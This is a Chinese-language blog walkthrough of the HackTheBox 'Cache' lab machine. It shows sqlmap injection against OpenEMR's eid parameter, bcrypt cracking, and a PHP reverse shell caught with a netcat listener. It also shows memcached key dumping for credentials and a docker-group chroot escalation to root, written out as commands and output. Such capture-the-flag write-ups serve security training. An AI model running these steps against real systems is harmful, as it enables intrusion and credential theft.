HackTheBox-Cache-Walkthrough

  • A+
所属分类:安全文章

0x01 Info Card

HackTheBox-Cache-Walkthrough

0x02 Tools and Tips

  • nmap

  • cewl

  • wfuzz

  • sqlmap

  • openEMR exploit

  • memcached exploit

  • docker priv

0x03 Pentesting

Initial Enumeration

nmap扫描

# Nmap 7.80 scan initiated Wed May 20 16:58:59 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 17:00:01 2020 -- 1 IP address (1 host up) scanned in 61.63 seconds

80端口

主页没有什么有效信息,尝试暴力破解无效:

HackTheBox-Cache-Walkthrough

查看Network页面加载了functionality.js

$(function(){

    var error_correctPassword = false;
    var error_username = false;

    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != '[email protected]_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event{
        /* Act on the event */
        error_correctPassword = false;
         checkCorrectPassword();
         error_username = false;
         checkCorrectUsername();


        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });

});

有登录名和密码ash:[email protected]_fun,成功登录之后也没有可以利用的点,再看Author页面:

HackTheBox-Cache-Walkthrough

实在是没啥思路,去HTB forum私聊一下各位大佬,提示我用cewl工具提取Autor page's information,再去FUZZ HOST。

后来才知道用这个页面的单词和cewl工具生成一个包含域名的字典:

# kali @ kali in ~/HackTheBox/Cache [16:24:16]
$ cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)

用wfuzz查找域名:

# kali @ kali in ~/HackTheBox/Cache [16:52:57] 
$ wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================


000000037:   302        0 L      0 W      0 Ch        "HMS"

Total time: 2.130227
Processed Requests: 42
Filtered Requests: 41
Requests/sec.: 19.71620

-hc 404 -hh 8193 这两个参数是为了限制一些无效的返回消息。

HMS.htb加入到/etc/hosts文件中。

HMS.htb

HackTheBox-Cache-Walkthrough

弱口令无效,查找有没有公开的利用方式:

HackTheBox-Cache-Walkthrough

发现已经有很多不同版本的exploit,再尝试用OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution,运行之后提示要系统的账号和密码。Google OpenEMR,在YouTube上看到了一个SQL注入的相关漏洞。

根据视频的步骤,首先访问http://hms.htb/portal

HackTheBox-Cache-Walkthrough

点击Register后访问http://hms.htb/portal/add_edit_event_user.php,这里的eid参数存在SQL注入:

HackTheBox-Cache-Walkthrough

用burp拦截请求,把请求数据保存到req.txt

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=0bcd8bfgl4rl2sfc8qmg63u09b; PHPSESSID=juj09jki6pu38k34afv60j3vb9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

dump database

用sqlmap爆破数据库:

$ sqlmap -r req.txt --dbs --batch
[11:52:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[11:52:46] [INFO] fetching database names
[11:52:47] [INFO] retrieved: 'information_schema'
[11:52:48] [INFO] retrieved: 'openemr'
available databases [2]:                                                                                                                                                                                         
[*] information_schema
[*] openemr

然后接着就是sqlmap一把梭,找到users_secure数据表,查看usernamepassword字段,dump

[12:03:13] [INFO] fetching entries of column(s) '`password`, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username      | password                                                     |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+

用john爆破hash密码:

# kali @ kali in ~/HackTheBox/Cache [12:11:02] 
$ sudo john -w=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-05-27 12:11) 1.694g/s 1464p/s 1464c/s 1464C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed

得到登录用户名和密码:openemr_admin:xxxxxx

upload reverse shell

通过Administration->Files模块上传reverse shell,写入letter_templates/custom_pdf.php文件中:

HackTheBox-Cache-Walkthrough

本机监听4444端口,浏览器访问http://hms.htb/sites/default/letter_templates/custom_pdf.php

$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.188] 54188
bash: cannot set terminal process group (2111): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www/hms.htb/public_html/sites/default/letter_templates$ id
<.htb/public_html/sites/default/letter_templates$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting User Access

用www用户在靶机漫游了一波,发现有ash用户,试一试密码复用,用functionality.js中的登录凭证切换ash用户:

[email protected]:/var/www$ su ash
su ash
Password: [email protected]_fun
[email protected]:/var/www$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash)
[email protected]:~$ cat user.txt
cat user.txt
93bf------------------------8dfe

memcached exploit

查看本地运行服务:

[email protected]:~$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -

11211端口是运行memcached服务,利用方式(新技能Get):

https://www.hackingarticles.in/penetration-testing-on-memcached-server/

https://niiconsulting.com/checkmate/2013/05/memcache-exploit/

fetch the slab statistics:

[email protected]:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'
stats slabs
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 5
STAT 1:free_chunks 10917
STAT 1:free_chunks_end 0
STAT 1:mem_requested 371
STAT 1:get_hits 1
STAT 1:cmd_set 7730
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048576
END

通过slab id查看组织结构items:

stats items
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 52
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 220
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 7735
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 1
STAT items:1:hits_to_temp 0
END

dump all the keys:

stats cachedump 1 0
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

读取userpasswd

get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

SSH登录:

$ ssh [email protected]
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '
10.10.10.188' (ECDSA) to the list of known hosts.
[email protected]'
s password:
[email protected]:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

观察到luffy是属于docker用户组。

Getting Root Access

GTFObins docke

HackTheBox-Cache-Walkthrough

查看docker镜像

[email protected]:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        8 months ago        64.2MB

照着GTFObins给的方法进行提权:

[email protected]:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/# cd  
[email protected]:~# cat root.txt
32fc------------------------ceab

0x04 Reference

Topic Url
OpenEmr Vulnerability ( video) https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s
Memecache https://www.hackingarticles.in/penetration-testing-on-memcached-server/
Memcacahe https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
Docker https://gtfobins.github.io/gtfobins/docker/


本文始发于微信公众号(星盟安全):HackTheBox-Cache-Walkthrough

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: